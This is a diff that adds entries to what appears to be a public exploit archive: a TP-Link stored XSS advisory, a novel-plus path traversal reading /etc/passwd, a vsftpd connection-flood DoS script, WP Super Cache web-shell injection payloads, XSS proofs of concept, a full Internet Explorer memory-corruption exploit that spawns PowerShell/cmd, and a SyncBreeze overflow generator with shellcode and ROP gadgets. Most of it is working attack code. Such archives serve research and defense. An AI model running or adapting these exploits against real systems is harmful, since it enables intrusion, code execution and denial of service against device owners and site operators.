diff --git a/exploits/hardware/webapps/49720.txt b/exploits/hardware/webapps/49720.txt
new file mode 100644
index 000000000..3f0c27f75
--- /dev/null
+++ b/exploits/hardware/webapps/49720.txt
@@ -0,0 +1,143 @@
+# Exploit Title: TP-Link Devices - 'setDefaultHostname' Stored Cross-site Scripting (Unauthenticated)
+# Date: 24-07-2020
+# Exploit Author: Smriti Gaba, Kaustubh Padwad
+# Vendor Homepage: https://www.tp-link.com
+# Version: Multiple
+
+==============================================================
+Unauthenticated Stored Cross-site Scripting in Multiple TP-Link Devices
+==============================================================
+
+Overview
+========
+
+Products:
+1. DSL and DSL Gateway
+2. Access Points
+3. WIFI Routers
+
+Tested Version: : Multiple versions of DSL & DSL Gateway, WIFI Routers and
+Access Points including:
+
+-------------------------------------------------------------------------------
+Model             |   Firmware Version
+    |
+-------------------------------------------------------------------------------
+TD-W9977          |
+TD-W9977v1_0.1.0_0.9.1_up_boot(161123)_2016-11-23_15.36.15 |
+TL-WA801ND        | TL-WA801NDv5_US_0.9.1_3.16_up_boot[170905-rel56404]
+   |
+TL-WA801N         | TL-WA801Nv6_EU_0.9.1_3.16_up_boot[200116-rel61815]
+    |
+TL-WR802N         | TL-WR802Nv4_US_0.9.1_3.17_up_boot[200421-rel38950]
+    |
+Archer-C3150      | ArcherC3150(US)_V2_170926)
+    |
+-------------------------------------------------------------------------------
+
+Severity: Med-High
+
+About the Product:
+==================
+
+* The (products from above list)  are high performance WIFI Routers(Wireless AC routers), Access Points, ADSL + DSL Gateways and Routers.
+* Provides Configuration modes: Access Point mode, Router Mode, Range Extender mode.
+* Provide Ethernet and other interfaces to meet the access requirements of different devices.
+* It can provide high-performance functionalities, services for home users, individual users, and businesses.
+* Supports multiple functionalities including CWMP management, TR069 Configuration, SNMP management, Traffic statistics, etc.
+
+Description:
+============
+An issue was discovered, common to all the TP-Link products including WIFI Routers(Wireless AC routers), Access Points, ADSL + DSL Gateways and Routers.
+This affected TD-W9977v1,TL-WA801NDv5, TL-WA801Nv6, TL-WA802Nv5, Archer C3150v2 devices. A malicious XSS payload if injected in hostname of Wireless Client devices connected to TP-Link device, allows remote attackers to execute unauthenticated malicious scripts because of improper validation of hostname. Some of the pages including dhcp.htm, networkMap.htm, dhcpClient.htm, qsEdit.htm, qsReview.htm and others use this vulnerable hostname function(setDefaultHostname()) without sanitization and push the value of hostname ($defaulthostname) directly to the ACT stack along with other parameters. The ACT stack is called on for multiple operation ids covering LAN, WAN and while intialisation of multiple tables (arp, dhcp, client list) across the device. For example, ACT_SET stack for WAN_IP_CONN is called while dhcp operation, during which value of vulnerable defaulthostname is being assigned to parameter X_TP_Hostname and pushed to stack. This causes XSS at all the endpoints which display hostname for example: Wireless client information table, ARP bind table such as networkMap, DHCP.
+
+Additional Information
+========================
+The hostname value is only validated on ASCII characters, while there is no validation for Non-ASCII characters which allows hostname with XSS payload say "<script>alert('XSS')</script>" to execute. This value of hostname is pushed to an array as plain text along with IP address and MAC address in initClientListTable() function, and other tables use the same value of hostname accross the device. This array is then returned to the callback function which in turn is called from proxy.js.
+This data is pushed to stack corresponding to operation:"LAN_HOST_ENTRY" (vary for different firmware), operation id: "gl" (gl is getList function). As client initiates request with operation id:"LAN_HOST_ENTRY" and oid: "gl", $dm.getList and $.act is called which fetches the corresponding stack and sends data to ajax call. The crafted value of hostname is sent to the device and results in execution of payload.
+
+[Affected Component]
+hostName parameter inside different htm pages including DHCP, DhcpAP, ArpBind, networkMap.
+
+------------------------------------------
+[Attack Type]
+Remote
+------------------------------------------
+[Impact Code execution]
+true
+
+------------------------------------------
+[Attack Vectors]
+Malicious payload execution on initiating request for Wireless Client List table or DHCP html page.
+
+[Vulnerability Type]
+====================
+Stored Cross-site Scripting
+
+How to Reproduce: (POC):
+========================
+
+    1. Change the default hostname of wireless client by using following command (for Linux):
+        a. vi /etc/dhcp/dhclient.conf
+        b. Insert and change the value of hostname to xss payload "<script>alert('XSS')</script>"
+    2. Renew IP address by sending DHCP request to TP-Link device via following command:
+        a. vi /etc/network/interfaces
+        b. Add these lines:
+            auto wlan0
+            iface wlan0 inet dhcp
+        c. On Terminal run command: ifup wlan0
+    3. Login to the router web interface, navigate to DHCP settings or Wireless Client tab.
+    4. As soon as DHCP or Wireless client table is requested Xss payload executes and pops up alert box.
+
+Mitigation
+==========
+
+ ---------------------------------------------------------------------------------------------------------
+| Model             |   Firmware Version
+       | Mitigation Comments   |
+ ---------------------------------------------------------------------------------------------------------
+| TL-WA801ND        | TL-WA801NDv5_US_0.9.1_3.16_up_boot[170905-rel56404]
+      | Patched               |
+| TL-WA801N         | TL-WA801Nv6_EU_0.9.1_3.16_up_boot[200116-rel61815]
+       | Patched               |
+| TL-WR802N         | TL-WR802Nv4_US_0.9.1_3.17_up_boot[200421-rel38950]
+       | Patched               |
+| Archer-C3150      | ArcherC3150(US)_V2_170926)
+       | EOL Product           |
+| TD-W9977          |
+TD-W9977v1_0.1.0_0.9.1_up_boot(161123)_2016-11-23_15.36.15  | EOL Product
+        |
+ ---------------------------------------------------------------------------------------------------------
+
+Link for patched software version for products:
+    1. TL-WA801ND -
+https://tp-link.com/beta/2021/202101/20210120/TL-WA801NDv5_US_0.9.1_3.16_up_boot[210119-rel61453].zip
+    2. TL-WA801N -
+https://tp-link.com/beta/2021/202101/20210120/TL-WA801Nv6_EU_0.9.1_3.16_up_boot[210119-rel62190].zip
+    3. TL-WR802N -
+https://tp-link.com/beta/2021/202101/20210120/TL-WR802Nv4_US_0.9.1_3.17_up_boot[210119-rel63071].zip
+
+[Vendor of Product]
+TP-LINK (https://www.tp-link.com)
+
+Disclosure Timeline:
+===================
+24-July-2020 Discoverd the vulnerability
+11-Aug-2020 Responsibly disclosed vulnerability to vendor
+15-Aug-2020 Vendor Acknowledged the disclosure
+17-Nov-2020 Communicated with vendor after 90 days for updates
+19-Nov-2020 Vendor asked for model and version details
+20-Nov-2020 Provided the required details to vendor
+25-Nov-2020 Vendor provided software build to verify the issue
+9-Dec-2020 Issue not fixed in the provided software.
+4-Jan-2021 Asked Updates on the status of the issue.
+20-Jan-2021 Vendor provided software build to verify the issue.
+20-Jan-2021 Issue found fixed in the provided software.
+21-Jan-2021 Requested for CVE-ID assignment
+25-March-2021 CVE-ID Assigned.
+
+credits:
+========
+
+* Smriti Gaba
+* Kaustubh Padwad
\ No newline at end of file
diff --git a/exploits/java/webapps/49724.txt b/exploits/java/webapps/49724.txt
new file mode 100644
index 000000000..b3eeb16ca
--- /dev/null
+++ b/exploits/java/webapps/49724.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Novel Boutique House-plus 3.5.1 - Arbitrary File Download
+# Date: 27/03/2021
+# Exploit Author: tuyiqiang
+# Vendor Homepage: https://xiongxyang.gitee.io/
+# Software Link: https://gitee.com/novel_dev_team/novel-plus,https://github.com/201206030/novel-plus
+# Version: all
+# Tested on: linux
+
+Vulnerable code:
+
+com/java2nb/common/controller/FileController.java
+
+@RequestMapping(value = "/download")
+public void fileDownload(String filePath,String fileName, HttpServletResponse resp) throws Exception {
+      String realFilePath = jnConfig.getUploadPath() + filePath;
+      InputStream in = new FileInputStream(realFilePath);
+            fileName = URLEncoder.encode(fileName, "UTF-8");
+      resp.setHeader("Content-Disposition", "attachment;filename=" + fileName);
+
+      resp.setContentLength(in.available());
+
+      OutputStream out = resp.getOutputStream();
+      byte[] b = new byte[1024];
+      int len = 0;
+      while ((len = in.read(b)) != -1) {
+         out.write(b, 0, len);
+      }
+      out.flush();
+      out.close();
+      in.close();
+}
+
+
+Guide:
+
+1. Log in to background management
+2. http://xxxx/common/sysFile/download?filePath=../../../../../../../../../../../../../../../../../etc/passwd&fileName=passwd
\ No newline at end of file
diff --git a/exploits/multiple/remote/49719.py b/exploits/multiple/remote/49719.py
new file mode 100755
index 000000000..8416ff205
--- /dev/null
+++ b/exploits/multiple/remote/49719.py
@@ -0,0 +1,101 @@
+# Exploit Title: vsftpd 3.0.3 - Remote Denial of Service
+# Date: 22-03-2021
+# Exploit Author: xynmaps
+# Vendor Homepage: https://security.appspot.com/vsftpd.html
+# Software Link: https://security.appspot.com/downloads/vsftpd-3.0.3.tar.gz
+# Version: 3.0.3
+# Tested on: Parrot Security OS 5.9.0
+
+#-------------------------------#
+
+#encoding=utf8
+#__author__ = XYN/Dump/NSKB3
+#VSFTPD Denial of Service exploit by XYN/Dump/NSKB3.
+"""
+VSFTPD only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
+you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
+(if it's limited, just run this script from different proxies using proxychains, and it will work)
+"""
+
+import socket
+import sys
+import threading
+import subprocess
+import time
+
+banner = """
+._________________.
+|     VS-FTPD     |
+|      D o S      |
+|_________________|
+|By XYN/DUMP/NSKB3|
+|_|_____________|_|
+|_|_|_|_____|_|_|_|
+|_|_|_|_|_|_|_|_|_|
+
+"""
+usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])
+
+def test(t,p):
+	s = socket.socket()
+	s.settimeout(10)
+	try:
+		s.connect((t, p))
+		response = s.recv(65535)
+		s.close()
+		return 0
+	except socket.error:
+		print("Port {} is not open, please specify a port that is open.".format(p))
+		sys.exit()
+def attack(targ, po, id):
+	try:
+		subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+		#print("Worker {} running".format(id))
+	except OSError: pass
+def main():
+	global target, port, start
+	print banner
+	try:
+		target = sys.argv[1]
+	except:
+		print usage
+		sys.exit()
+	try:
+		port = int(sys.argv[2])
+	except:
+		port = 21
+	try:
+		conns = int(sys.argv[3])
+	except:
+		conns = 50
+	print("[!] Testing if {0}:{1} is open".format(target, port))
+	test(target, port)
+	print("[+] Port {} open, starting attack...".format(port))
+	time.sleep(2)
+	print("[+] Attack started on {0}:{1}!".format(target, port))
+	def loop(target, port, conns):
+		global start
+		threading.Thread(target=timer).start()
+		while 1:
+			for i in range(1, conns + 3):
+				t = threading.Thread(target=attack, args=(target,port,i,))
+				t.start()
+				if i > conns + 2:
+					t.join()
+					break
+					loop()
+
+	t = threading.Thread(target=loop, args=(target, port, conns,))
+	t.start()
+
+def timer():
+        start = time.time()
+        while 1:
+                if start < time.time() + float(900): pass
+                else:
+                        subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+                        t = threading.Thread(target=loop, args=(target, port,))
+			t.start()
+                        break
+
+main()
\ No newline at end of file
diff --git a/exploits/php/webapps/49718.txt b/exploits/php/webapps/49718.txt
new file mode 100644
index 000000000..cea0c8b13
--- /dev/null
+++ b/exploits/php/webapps/49718.txt
@@ -0,0 +1,48 @@
+# Exploit Title: WordPress Plugin WP Super Cache 1.7.1 - Remote Code Execution (Authenticated)
+# Google Dork: inurl:/wp-content/plugins/wp-super-cache/
+# Date: 2021-03-13
+# Exploit Author: m0ze
+# Version: <= 1.7.1
+# Software Link: https://wordpress.org/plugins/wp-super-cache/
+
+
+### -- [ Info: ]
+
+[i] An Authenticated RCE vulnerability was discovered in the WP Super Cache plugin through 1.7.1 for WordPress.
+
+[i] RCE due to input validation failure and weak $cache_path check in the WP Super Cache Settings -> Cache Location option. Direct access to the wp-cache-config.php file is not prohibited, so this vulnerability can be exploited for a web shell injection.
+
+[i] Another possible attack vector: from XSS to RCE.
+
+### -- [ Impact: ]
+
+[~] Full compromise of the vulnerable web application and also web server.
+
+### -- [ Payloads: ]
+
+[$] ';system($_GET[13]);include_once \'wp-cache-config.php\';'
+
+[$] ';`$_GET[13]`;include_once \'wp-cache-config.php\';?><!--
+
+[$] ';`$_GET[13]`;#
+
+
+### -- [ PoC #1 | Authenticated RCE | Cache Location: ]
+
+[!] POST /wp-admin/options-general.php?page=wpsupercache&tab=settings
+HTTP/1.1
+Host: example.com
+User-Agent: Mozilla/5.0
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 501
+Cookie: [cookies]
+
+_wpnonce=88a432b100&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwpsupercache%26tab%3Dsettings&action=scupdates&wp_cache_enabled=1&wp_cache_mod_rewrite=0&wp_cache_not_logged_in=2&cache_rebuild_files=1&wp_cache_location=%2Fvar%2Fwww%2Fyour%2Fown%2Fpath%2Fexample.com%2Fwp-content%2Fcache%2F%27%3Bsystem%28%24_GET%5B13%5D%29%3Binclude_once+%5C%27wp-cache-config.php%5C%27%3B%27&_wpnonce=88a432b100&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwpsupercache%26tab%3Dsettings
+
+
+
+### -- [ PoC #2 | From XSS to RCE | Cache Location: ]
+
+[!] https://m0ze.ru/payload/wp-super-cache-rce.js
+
+[!] https://m0ze.ru/payload/wp-super-cache-rce-j.js
\ No newline at end of file
diff --git a/exploits/php/webapps/49721.txt b/exploits/php/webapps/49721.txt
new file mode 100644
index 000000000..7ebbf34ee
--- /dev/null
+++ b/exploits/php/webapps/49721.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Concrete5 8.5.4 - 'name' Stored XSS
+# Date: 2021-01 
+# Exploit Author: Quadron Research Lab
+# Version: Concrete5 8.5.4 
+# Tested on: Windows 10 x64 HUN/ENG Professional
+# Vendor: Concrete5 CMS (https://www.concrete5.org)
+# CVE: CVE-2021-3111
+
+[Suggested description]
+The Express Entries Dashboard inConcrete5 8.5.4 allows stored XSS via the name field of a new data object at anindex.php/dashboard/express/entries/view/ URI.
+
+[Attack Vectors]
+Creating a new data object, the name field is not filtered.  It is possible to place JavaScript code. [Stored XSS]
+
+Proof of Concept
+https://github.com/Quadron-Research-Lab/CVE/blob/main/CVE-2021-3111.pdf
\ No newline at end of file
diff --git a/exploits/php/webapps/49722.txt b/exploits/php/webapps/49722.txt
new file mode 100644
index 000000000..75a97d5e5
--- /dev/null
+++ b/exploits/php/webapps/49722.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Equipment Inventory System 1.0 - 'multiple' Stored XSS
+# Exploit Author: Jitendra Kumar Tripathi
+# Vendor Homepage: https://www.sourcecodester.com/php/11327/equipment-inventory.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=11327&title=Equipment+Inventory+System+using+PHP+with+Source+Code
+# Version: 1
+# Tested on Windows 10 + Xampp 8.0.3
+
+Vulnerable Parameters: Item List , Employee Details , Position of Employee
+
+*Steps to reproduce:*
+1: Log in with a valid username and password. 
+
+2: Navigate to http://localhost/deped/admin/item.php
+   Add Item 
+   Payload : <script>alert(1)</script>
+
+   Navigate to http://localhost/deped/admin/employee.php
+   Add Employee
+   Payload : <script>alert(2)</script>
+   
+   Post Saved Sucessfully , reload your page or navigate to any page you will see these XSS triggered.
\ No newline at end of file
diff --git a/exploits/php/webapps/49723.txt b/exploits/php/webapps/49723.txt
new file mode 100644
index 000000000..0ca3dfeb1
--- /dev/null
+++ b/exploits/php/webapps/49723.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Budget Management System 1.0 - 'Budget title' Stored XSS
+# Exploit Author: Jitendra Kumar Tripathi
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14403/budget-management-system.html
+# Version: 1
+# Tested on Windows 10 + Xampp 8.0.3
+
+XSS IMPACT:
+1: Steal the cookie
+2: User redirection to a malicious website
+
+Vulnerable Parameters: Customer Details
+
+*Steps to reproduce:*
+ Add Budget Title
+ Payload : <script>alert(1)</script>
+ Reload the http://localhost/Budget%20Management%20System/index.php or update the budget , the xss will get triggered.
\ No newline at end of file
diff --git a/exploits/windows/remote/46928.html b/exploits/windows/remote/46928.html
new file mode 100644
index 000000000..5adb09e1f
--- /dev/null
+++ b/exploits/windows/remote/46928.html
@@ -0,0 +1,138 @@
+# Exploit Title: Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption
+# Date: 03/2019
+# Author: Simon Zuckerbraun
+# Vendor: https://www.microsoft.com/
+# Version: February 2019 patch level
+# Tested on: Windows 10 1809 17763.316
+# CVE: CVE-2019-0752
+
+<!-- Full exploit of ZDI-19-359/ZDI-CAN-7757/CVE-2019-0752                                      -->
+<!-- Target: Internet Explorer, Windows 10 1809 17763.316 (Feb. 2019 patch level)               -->
+<!-- Vulnerability and original exploit technique by Simon Zuckerbraun (@HexKitchen), Mar. 2019 -->
+
+<!-- Tgroupcrew@gmail.com -->
+
+<!-- Demonstrates taking an arbitrary write primitive with no info leak, and using it to get    -->
+<!-- all the way to RCE using no shellcode.                                                     -->
+
+<!-- Note use of CVE-2019-0768 to get VBScript to run on IE/Win10.                              -->
+<!--    (h/t: James Forshaw, Google Project Zero)                                               -->
+
+<html>
+<meta http-equiv="x-ua-compatible" content="IE=8">
+<meta http-equiv="Expires" content="-1">
+<body>
+	<div id="container1" style="overflow:scroll; width: 10px">
+		<div id="content1" style="width:5000000px">
+			Content
+		</div>
+	</div>
+<script language="VBScript.Encode">
+Dim ar1(&h3000000)
+Dim ar2(1000)
+Dim gremlin
+addressOfGremlin = &h28281000
+Class MyClass
+	Private mValue
+	Public Property Let Value(v)
+		mValue = v
+	End Property
+	Public Default Property Get P
+		P = mValue				' Where to write
+	End Property
+End Class
+Sub TriggerWrite(where, val)
+	Dim v1
+	Set v1 = document.getElementById("container1")
+	v1.scrollLeft = val		' Write this value (Maximum: 0x001767dd)
+	Dim c
+	Set c = new MyClass
+	c.Value = where
+	Set v1.scrollLeft = c
+End Sub
+' Our vulnerability does not immediately give us an unrestricted
+' write (though we could manufacture one). For our purposes, the
+' following is sufficient. It writes an arbitrary DWORD to an
+' arbitrary location, and sets the subsequent 3 bytes to zero.
+Sub WriteInt32With3ByteZeroTrailer(addr, val)
+	TriggerWrite addr    , (val) AND &hff
+	TriggerWrite addr + 1, (val\&h100) AND &hff
+	TriggerWrite addr + 2, (val\&h10000) AND &hff
+	TriggerWrite addr + 3, (val\&h1000000) AND &hff
+End Sub
+Sub WriteAsciiStringWith4ByteZeroTrailer(addr, str)
+	For i = 0 To Len(str) - 1
+		TriggerWrite addr + i, Asc(Mid(str, i + 1, 1))
+	Next
+End Sub
+Function ReadInt32(addr)
+	WriteInt32With3ByteZeroTrailer addressOfGremlin + &h8, addr
+	ReadInt32 = ar1(gremlin)
+End Function
+Function LeakAddressOfObject(obj)
+	Set ar1(gremlin + 1) = obj
+	LeakAddressOfObject = ReadInt32(addressOfGremlin + &h18)
+End Function
+Sub Exploit()
+	' Corrupt vt of one array element (the "gremlin")
+	TriggerWrite addressOfGremlin, &h4003	' VT_BYREF | VT_I4
+	For i = ((addressOfGremlin - &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100
+		If Not IsEmpty(ar1(i)) Then
+			gremlin = i
+			Exit For
+		End If
+	Next
+	
+	If IsEmpty(gremlin) Then
+		MsgBox "Could not find gremlin"
+		Exit Sub
+	End If
+	
+	For i = 0 To UBound(ar2)
+		Set ar2(i) = CreateObject("Scripting.Dictionary")
+	Next
+	
+	Set dict = ar2(UBound(ar2) / 2)
+	addressOfDict = LeakAddressOfObject(dict)
+	vtableOfDict = ReadInt32(addressOfDict)
+	scrrun = vtableOfDict - &h11fc
+	kernel32 = ReadInt32(scrrun + &h1f1a4) - &h23c90
+	winExec = kernel32 + &h5d380
+	
+	dict.Exists "dummy"		' Make a dispatch call, just to populate pld
+	' Relocate pld to ensure its address doesn't contain a null byte
+	pld = ReadInt32(addressOfDict + &h3c)
+	fakePld = &h28281020
+	For i = 0 To 3 - 1
+		WriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i)
+	Next
+	
+	fakeVtable = &h28282828		' ASCII "(((("
+	For i = 0 To 21
+		If i = 12 Then		' Dictionary.Exists
+			fptr = winExec
+		Else
+			fptr = ReadInt32(vtableOfDict + 4 * i)
+		End If
+		WriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr
+	Next
+	
+	WriteAsciiStringWith4ByteZeroTrailer addressOfDict, "((((\..\PowerShell.ewe -Command ""<#AAAAAAAAAAAAAAAAAAAAAAAAA"
+	WriteInt32With3ByteZeroTrailer addressOfDict + &h3c, fakePld
+	WriteAsciiStringWith4ByteZeroTrailer addressOfDict + &h40, "#>$a = """"Start-Process cmd `""""""/t:4f /k whoami /user`"""""""""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"""
+	
+	On Error Resume Next
+	dict.Exists "dummy"		' Wheeee!!
+	
+	' A little cleanup to help prevent crashes after the exploit
+	For i = 1 To 3
+		WriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict
+		WriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2
+	Next
+	Erase Dict
+	Erase ar2
+End Sub
+Exploit
+</script>
+</body>
+</html>
\ No newline at end of file
diff --git a/exploits/windows/webapps/49725.py b/exploits/windows/webapps/49725.py
new file mode 100755
index 000000000..5fb415f2c
--- /dev/null
+++ b/exploits/windows/webapps/49725.py
@@ -0,0 +1,115 @@
+# Exploit Title: SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow
+# Date: 03/27/2021
+# Author: Filipe Oliveira - filipecenturiao[at]hotmail.com Rafael Machado  - nnszs[at]protonmail.com
+# Vendor: https://www.syncbreeze.com/
+# Software Link: https://www.4shared.com/file/57pE4sZfiq/syncbreeze_setup_v10116.html
+# Version: SyncBreeze v10.1.16 x86
+# Tested on: Windows 10 x64 (19042.867)
+# CVE: CVE-2017-15950
+
+Usage: The exploit will generate a POC file, called xplSyncBreeze.xml. Launch the application and click on Import Command, then load the POC file. 
+
+# -*- coding: utf-8 -*-
+    
+import struct
+
+# badchars
+#\x00\x0a\x0d\x20\x27
+#\x81\x82\x83\x84\x85\x86\x87\x88
+#\x89\x8A\x8B\x8C\x8D\x8E\x8F\x90
+#\x91\x92\x93\x94\x95\x96\x97\x98
+#\x99\x9A\x9B\x9C\x9D\x9E\x9F\xA0
+#\xA1\xA2\xA3\xA4\xA5\xA6\xA7\xA8
+#\xA9\xAA\xAB\xAC\xAD\xAE\xAF\xB0
+#\xB1\xB2\xB3\xB4\xB5\xB6\xB7\xB8
+#\xB9\xBA\xBB\xBC\xBD\xBE\xBF\xC0
+#\xC1\xC2\xC3\xC4\xC5\xC6\xC7\xC8
+#\xC9\xCA\xCB\xCC\xCD\xCE\xCF\xD0
+#\xD1\xD2\xD3\xD4\xD5\xD6\xD7\xD8
+#\xD9\xDA\xDB\xDC\xDD\xDE\xDF\xE0
+#\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8
+#\xE9\xEA\xEB\xEC\xED\xEE\xEF\xF0
+#\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8
+#\xF9\xFA\xFB\xFC\xFD\xFE\xFF
+
+# Shellcode payload size: 432 bytes
+# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed BufferRegister=EAX -b '\x00\x0A\x0D\x20\x27' -v shellcode -f python
+
+shellcode =  b""
+shellcode += b"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
+shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
+shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
+shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x6b\x4c\x69"
+shellcode += b"\x78\x4e\x62\x75\x50\x77\x70\x35\x50\x45\x30"
+shellcode += b"\x4b\x39\x59\x75\x55\x61\x39\x50\x52\x44\x4e"
+shellcode += b"\x6b\x42\x70\x50\x30\x6e\x6b\x42\x72\x54\x4c"
+shellcode += b"\x6c\x4b\x70\x52\x74\x54\x4c\x4b\x62\x52\x66"
+shellcode += b"\x48\x44\x4f\x48\x37\x61\x5a\x51\x36\x45\x61"
+shellcode += b"\x39\x6f\x6e\x4c\x75\x6c\x43\x51\x71\x6c\x65"
+shellcode += b"\x52\x56\x4c\x47\x50\x4b\x71\x38\x4f\x74\x4d"
+shellcode += b"\x37\x71\x49\x57\x38\x62\x7a\x52\x52\x72\x36"
+shellcode += b"\x37\x4c\x4b\x63\x62\x42\x30\x6c\x4b\x31\x5a"
+shellcode += b"\x57\x4c\x4c\x4b\x32\x6c\x36\x71\x31\x68\x4a"
+shellcode += b"\x43\x47\x38\x47\x71\x4a\x71\x76\x31\x6c\x4b"
+shellcode += b"\x36\x39\x67\x50\x66\x61\x58\x53\x4c\x4b\x70"
+shellcode += b"\x49\x66\x78\x59\x73\x34\x7a\x53\x79\x6e\x6b"
+shellcode += b"\x50\x34\x4c\x4b\x66\x61\x4e\x36\x55\x61\x39"
+shellcode += b"\x6f\x4c\x6c\x4a\x61\x4a\x6f\x34\x4d\x67\x71"
+shellcode += b"\x48\x47\x67\x48\x69\x70\x71\x65\x59\x66\x54"
+shellcode += b"\x43\x63\x4d\x79\x68\x75\x6b\x73\x4d\x67\x54"
+shellcode += b"\x44\x35\x79\x74\x72\x78\x4e\x6b\x53\x68\x71"
+shellcode += b"\x34\x57\x71\x5a\x73\x52\x46\x6c\x4b\x36\x6c"
+shellcode += b"\x72\x6b\x6c\x4b\x76\x38\x75\x4c\x67\x71\x68"
+shellcode += b"\x53\x6e\x6b\x57\x74\x4e\x6b\x63\x31\x78\x50"
+shellcode += b"\x6f\x79\x73\x74\x47\x54\x64\x64\x53\x6b\x31"
+shellcode += b"\x4b\x63\x51\x50\x59\x63\x6a\x43\x61\x39\x6f"
+shellcode += b"\x59\x70\x73\x6f\x31\x4f\x62\x7a\x4e\x6b\x44"
+shellcode += b"\x52\x6a\x4b\x4e\x6d\x53\x6d\x73\x5a\x63\x31"
+shellcode += b"\x4c\x4d\x4d\x55\x6f\x42\x75\x50\x47\x70\x33"
+shellcode += b"\x30\x46\x30\x50\x68\x74\x71\x6c\x4b\x42\x4f"
+shellcode += b"\x6e\x67\x39\x6f\x6e\x35\x6f\x4b\x58\x70\x78"
+shellcode += b"\x35\x79\x32\x46\x36\x33\x58\x79\x36\x4c\x55"
+shellcode += b"\x4f\x4d\x6d\x4d\x39\x6f\x6a\x75\x55\x6c\x63"
+shellcode += b"\x36\x61\x6c\x45\x5a\x6d\x50\x49\x6b\x39\x70"
+shellcode += b"\x32\x55\x75\x55\x6d\x6b\x57\x37\x64\x53\x74"
+shellcode += b"\x32\x52\x4f\x50\x6a\x53\x30\x61\x43\x59\x6f"
+shellcode += b"\x78\x55\x73\x53\x30\x61\x30\x6c\x72\x43\x43"
+shellcode += b"\x30\x41\x41"
+
+
+# padding to crash buffer
+basura = struct.pack('<L', 0x41414141) * 390
+
+# gadgets to move payload pointer into EAX
+GAD1 = struct.pack('<L', 0x65235465) # XCHG EAX,EBP
+GAD2 = struct.pack('<L', 0x6506537C) # CALL EAX
+
+# padding to reach buffer address stored in ebp
+basura2 = struct.pack('<L', 0x41414141) * 56
+
+# padding for stack pivot
+
+padding = struct.pack('<L', 0x41414141) * 4
+padding2 = struct.pack('<L', 0x41414141) * 20
+
+# stack pivot to reach an area with more space for gadgets on the stack
+# 0x6506491c: add esp, 0x48 ; pop edi ; pop esi ; ret
+
+pivot = struct.pack('<L', 0x6506491c)
+
+# final payload
+
+fruta = basura + pivot + padding + padding2 + GAD1 + GAD2 + basura2 + shellcode
+
+
+# write payload to xml file
+
+payload = open("xplSyncBreeze.xml", "wb")
+payload.write("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n".encode('utf-8'))
+
+payload.write("<sync name='".encode('utf-8'))
+payload.write(fruta)
+payload.write("'>\n</sync>\n".encode('utf-8'))
+
+payload.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 98edaeb89..613404ee3 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -18251,6 +18251,7 @@ id,file,description,date,author,type,platform,port
 46839,exploits/php/remote/46839.rb,"PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit)",2019-05-14,AkkuS,remote,php,
 46880,exploits/php/remote/46880.rb,"GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)",2019-05-20,Metasploit,remote,php,
 46915,exploits/php/remote/46915.rb,"Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)",2019-05-23,Metasploit,remote,php,
+46928,exploits/windows/remote/46928.html,"Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption",2019-05-24,"Simon Zuckerbraun",remote,windows,
 46932,exploits/macos/remote/46932.txt,"Typora 0.9.9.24.6 - Directory Traversal",2019-05-27,"Dhiraj Mishra",remote,macos,
 46934,exploits/windows/remote/46934.txt,"Petraware pTransformer ADC < 2.1.7.22827 - Login Bypass",2019-05-28,"Faudhzan Rahman",remote,windows,
 46942,exploits/java/remote/46942.rb,"Oracle Application Testing Suite - WebLogic Server Administration Console War Deployment (Metasploit)",2019-05-29,Metasploit,remote,java,
@@ -18432,6 +18433,7 @@ id,file,description,date,author,type,platform,port
 49663,exploits/windows/remote/49663.py,"Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)",2021-03-14,F5,remote,windows,
 49682,exploits/hardware/remote/49682.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access",2021-03-19,LiquidWorm,remote,hardware,
 49695,exploits/hardware/remote/49695.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Weak Default WiFi Password Algorithm",2021-03-22,LiquidWorm,remote,hardware,
